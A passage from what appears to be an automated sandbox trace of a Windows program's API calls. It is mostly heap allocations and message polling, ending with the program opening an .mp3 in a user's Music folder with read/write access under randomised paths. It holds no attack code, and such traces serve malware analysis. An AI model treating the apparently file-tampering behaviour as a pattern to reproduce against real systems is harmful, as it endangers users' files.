hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.773] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.773] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.774] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.775] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0181.775] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.775] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.775] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0181.775] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.776] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.777] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0181.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0181.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.780] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.781] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\axe49w4a sjdn r.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0181.782] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.782] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.782] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0181.782] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.782] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.782] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.784] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.784] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.784] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.784] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.784] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.784] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0181.784] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.784] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.785] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.785] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.785] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.785] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.785] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.785] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", 